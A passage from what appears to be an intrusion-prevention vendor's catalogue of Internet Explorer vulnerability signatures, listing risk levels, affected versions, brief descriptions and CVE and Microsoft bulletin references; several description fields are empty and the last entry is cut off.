References:

CVE-2015-0072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0072

BID-72489
http://www.securityfocus.com/bid/72489

OSVDB-117876
http://www.osvdb.org/117876

Microsoft-Internet-Explorer-Cross-Frame-Scripting-Restriction-Bypass

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Low

First detected in:

sgpkg-ips-998-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 5.0; Internet Explorer 6.0

Type:

Malfunction

Description:

There exists a vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Cross-Frame-Scripting-Restriction-Bypass

References:

CVE-2004-2383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2383

BID-9761
http://www.securityfocus.com/bid/9761

Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243

About this vulnerability:

A cross-site scripting vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-346-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

There is a cross-site scripting vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243
File-Text_Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243

References:

CVE-2010-3243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3243

MS10-072
http://technet.microsoft.com/security/bulletin/MS10-072

Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324

About this vulnerability:

A cross-site scripting vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-346-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

There is a cross-site scripting vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324
File-Text_Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324

References:

CVE-2010-3324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3324

MS10-072
http://technet.microsoft.com/security/bulletin/MS10-072

Microsoft-Internet-Explorer-Cstr-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-867-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Internet Explorer. A remote attacker can use this to gain access to sensitive information.

Situation:

File-Text_Microsoft-Internet-Explorer-Cstr-Use-After-Free

References:

CVE-2017-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0059

MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006

Microsoft-Internet-Explorer-Ctablecell-Information-Disclosure

About this vulnerability:	A vulnerability in Microsoft Internet Explorer
Risk:	High
First detected in:	sgpkg-ips-518-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Internet Explorer 9.0
Type:	Malfunction
Description:	An information disclosure vulnerability exists in Microsoft Internet Explorer. The vulnerability is caused by an error in CTableCell::get_cellIndex function in mshtml.dll. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would cause an information disclosure. Microsoft has not released an advisory regarding this vulnerability at this point.
Situation:	File-Text_Microsoft-Internet-Explorer-Ctablecell-Information-Disclosure

Microsoft-Internet-Explorer-Ctablecolcalc-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-682-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an out-of-bounds memory access. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Ctablecolcalc-Memory-Corruption

References:

CVE-2015-2499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2499

MS15-094
http://technet.microsoft.com/security/bulletin/MS15-094

Microsoft-Internet-Explorer-Ctitleelement-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Internet Explorer. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-Ctitleelement-Use-After-Free

References:

MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056

Microsoft-Internet-Explorer-CTreePos-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 7; Windows Vista; Windows 2003; Windows 2008

Software:

Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is caused by a Use-After-Free error when processing script code that accesses a CTreePos object. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CTreePos-Use-After-Free

References:

CVE-2013-3845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3845

BID-62187
http://www.securityfocus.com/bid/62187

OSVDB-97097
http://www.osvdb.org/97097

MS13-069
http://technet.microsoft.com/security/bulletin/MS13-069

Microsoft-Internet-Explorer-CTreePos-Use-After-Free-Vulnerability

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-491-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CTreePos-Use-After-Free-Vulnerability

References:

CVE-2012-1539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1539

BID-56421
http://www.securityfocus.com/bid/56421

MS12-071
http://technet.microsoft.com/security/bulletin/MS12-071

Microsoft-Internet-Explorer-CTxtPtr-Memory-Access-Error

About this vulnerability:	A vulnerability in Microsoft Internet Explorer
Risk:	High
First detected in:	sgpkg-ips-649-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Internet Explorer 11.0
Type:	Malfunction
Description:	An information disclosure vulnerability has been reported in Internet Explorer. The vulnerability is due to a read out of boundary when handling CTxtPtr::InsertRange objects. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, an attacker could disclosure the memory content of the current process which can be used to facilitate further attacks.
Situation:	File-Text_Microsoft-Internet-Explorer-CTxtPtr-Memory-Access-Error

Microsoft-Internet-Explorer-CVE-2010-3971

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-365-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

References:

CVE-2010-3971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3971

BID-45246
http://www.securityfocus.com/bid/45246

MS11-003
http://technet.microsoft.com/security/bulletin/MS11-003

Microsoft-Internet-Explorer-CVE-2013-3163-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-548-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to improperly freeing a child element such as CAnchorElement and trying to access the freed object later. A remote attacker could exploit these vulnerabilities by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2013-3163-Use-After-Free

References:

CVE-2013-3163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3163

OSVDB-94981
http://www.osvdb.org/94981

MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055

Microsoft-Internet-Explorer-CVE-2013-3184-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-543-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2013-3184-Memory-Corruption

References:

CVE-2013-3184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3184

OSVDB-96182
http://www.osvdb.org/96182

MS13-059
http://technet.microsoft.com/security/bulletin/MS13-059

Microsoft-Internet-Explorer-CVE-2013-3203-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2013-3203-Memory-Corruption

References:

CVE-2013-3203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3203

OSVDB-97092
http://www.osvdb.org/97092

MS13-069
http://technet.microsoft.com/security/bulletin/MS13-069

Microsoft-Internet-Explorer-CVE-2013-3205-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-543-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2013-3205-Memory-Corruption

References:

CVE-2013-3205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3205

BID-62208
http://www.securityfocus.com/bid/62208

OSVDB-97094
http://www.osvdb.org/97094

MS13-069
http://technet.microsoft.com/security/bulletin/MS13-069

Microsoft-Internet-Explorer-CVE-2014-0274-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-571-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Internet Explorer. The vulnerability is due to an error in the way objects are handled. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0274-Use-After-Free

References:

CVE-2014-0274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0274

OSVDB-103173
http://www.osvdb.org/103173

MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010

Microsoft-Internet-Explorer-CVE-2014-0275-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-566-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0275-Use-After-Free

References:

CVE-2014-0275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0275

OSVDB-103174
http://www.osvdb.org/103174

MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010

Microsoft-Internet-Explorer-CVE-2014-0282-Cinput-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A use after free vulnerability exists in Internet Explorer. The vulnerability is due to accessing a freed CInput object in memory. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0282-Cinput-Use-After-Free

References:

CVE-2014-0282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0282

BID-67862
http://www.securityfocus.com/bid/67862

OSVDB-107851
http://www.osvdb.org/107851

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-CVE-2014-0283-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-565-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Situation:

File-TextId_Microsoft-Internet-Explorer-CVE-2014-0283-Use-After-Free

References:

CVE-2014-0283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0283

OSVDB-103181
http://www.osvdb.org/103181

MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010

Microsoft-Internet-Explorer-CVE-2014-0286-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-565-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0286-Use-After-Free

References:

CVE-2014-0286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0286

OSVDB-103184
http://www.osvdb.org/103184

MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010

Microsoft-Internet-Explorer-CVE-2014-0287-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-569-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0287-Use-After-Free

References:

CVE-2014-0287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0287

OSVDB-103185
http://www.osvdb.org/103185

MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010

Microsoft-Internet-Explorer-CVE-2014-0303-Memory-Corruption

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-569-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Internet Explorer

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0303-Memory-Corruption

References:

CVE-2014-0303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0303

OSVDB-104300
http://www.osvdb.org/104300

MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012

Microsoft-Internet-Explorer-CVE-2014-0307-Use-After-Free

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0307-Use-After-Free

References:

CVE-2014-0307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0307

BID-66032
http://www.securityfocus.com/bid/66032

OSVDB-104304
http://www.osvdb.org/104304

MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012

Microsoft-Internet-Explorer-CVE-2014-0312-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0312-Use-After-Free

References:

CVE-2014-0312
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0312

OSVDB-104308
http://www.osvdb.org/104308

MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012

Microsoft-Internet-Explorer-CVE-2014-0313-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-569-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0313-Memory-Corruption

References:

CVE-2014-0313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0313

MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012

Microsoft-Internet-Explorer-CVE-2014-0324-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-569-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-0324-Memory-Corruption

References:

CVE-2014-0324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0324

MS14-012
http://technet.microsoft.com/security/bulletin/MS14-012

Microsoft-Internet-Explorer-CVE-2014-1765-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A use after free vulnerability exist in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-1765-Use-After-Free

References:

CVE-2014-1765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1765

BID-66244
http://www.securityfocus.com/bid/66244

OSVDB-104583
http://www.osvdb.org/104583

MS14-037
http://technet.microsoft.com/security/bulletin/MS14-037

Microsoft-Internet-Explorer-CVE-2014-1815-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Internet Explorer. A remote, unauthenticated attacker can use this to execute arbitrary code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-1815-Use-After-Free

References:

CVE-2014-1815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1815

OSVDB-106900
http://www.osvdb.org/106900

MS14-029
http://technet.microsoft.com/security/bulletin/MS14-029

Microsoft-Internet-Explorer-CVE-2014-2804-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows Vista; Windows 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-2804-Use-After-Free

References:

CVE-2014-2804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2804

BID-68386
http://www.securityfocus.com/bid/68386

MS14-037
http://technet.microsoft.com/security/bulletin/MS14-037

Microsoft-Internet-Explorer-CVE-2014-6366-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2003; Windows 2008

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-6366-Memory-Corruption

References:

CVE-2014-6366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6366

OSVDB-115569
http://www.osvdb.org/115569

MS14-080
http://technet.microsoft.com/security/bulletin/MS14-080

Microsoft-Internet-Explorer-CVE-2014-8966-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 2003; Windows 2008; Windows 2008 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2014-8966-Memory-Corruption

References:

CVE-2014-8966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8966

OSVDB-115577
http://www.osvdb.org/115577

MS14-080
http://technet.microsoft.com/security/bulletin/MS14-080

Microsoft-Internet-Explorer-CVE-2015-0041-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-630-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0;Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0;Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-0041-Use-After-Free

References:

CVE-2015-0041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0041

BID-72411
http://www.securityfocus.com/bid/72411

OSVDB-118161
http://www.osvdb.org/118161

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Microsoft-Internet-Explorer-CVE-2015-0053-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-630-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-0053-Memory-Corruption

References:

CVE-2015-0053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0053

BID-72421
http://www.securityfocus.com/bid/72421

OSVDB-118171
http://www.osvdb.org/118171

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Microsoft-Internet-Explorer-CVE-2015-0071-Policy-Bypass

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A security feature bypass vulnerability exist in Microsoft Internet Explorer. The vulnerability is due to unknown error in Internet Explorer. By exploiting this vulnerability, an attacker can more reliably predict memory offsets of specific instructions in a given call stack, which can be used to exploit other remote code execution vulnerabilities.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-0071-Policy-Bypass

References:

CVE-2015-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0071

BID-72455
http://www.securityfocus.com/bid/72455

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Microsoft-Internet-Explorer-CVE-2015-0100-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-634-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

A use after free vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an issue with handling certain objects in memory. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-0100-Use-After-Free

References:

CVE-2015-0100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0100

BID-72926
http://www.securityfocus.com/bid/72926

OSVDB-119346
http://www.osvdb.org/119346

MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018

Microsoft-Internet-Explorer-CVE-2015-1665-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-642-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-TextId_Microsoft-Internet-Explorer-CVE-2015-1665-Use-After-Free

References:

CVE-2015-1665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1665

MS15-032
http://technet.microsoft.com/security/bulletin/MS15-032

Microsoft-Internet-Explorer-CVE-2015-1667-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-642-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A use after free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CVE-2015-1667-Use-After-Free

References:

CVE-2015-1667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1667

OSVDB-120621
http://www.osvdb.org/120621

MS15-032
http://technet.microsoft.com/security/bulletin/MS15-032

Microsoft-Internet-Explorer-CVE-2015-1686-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

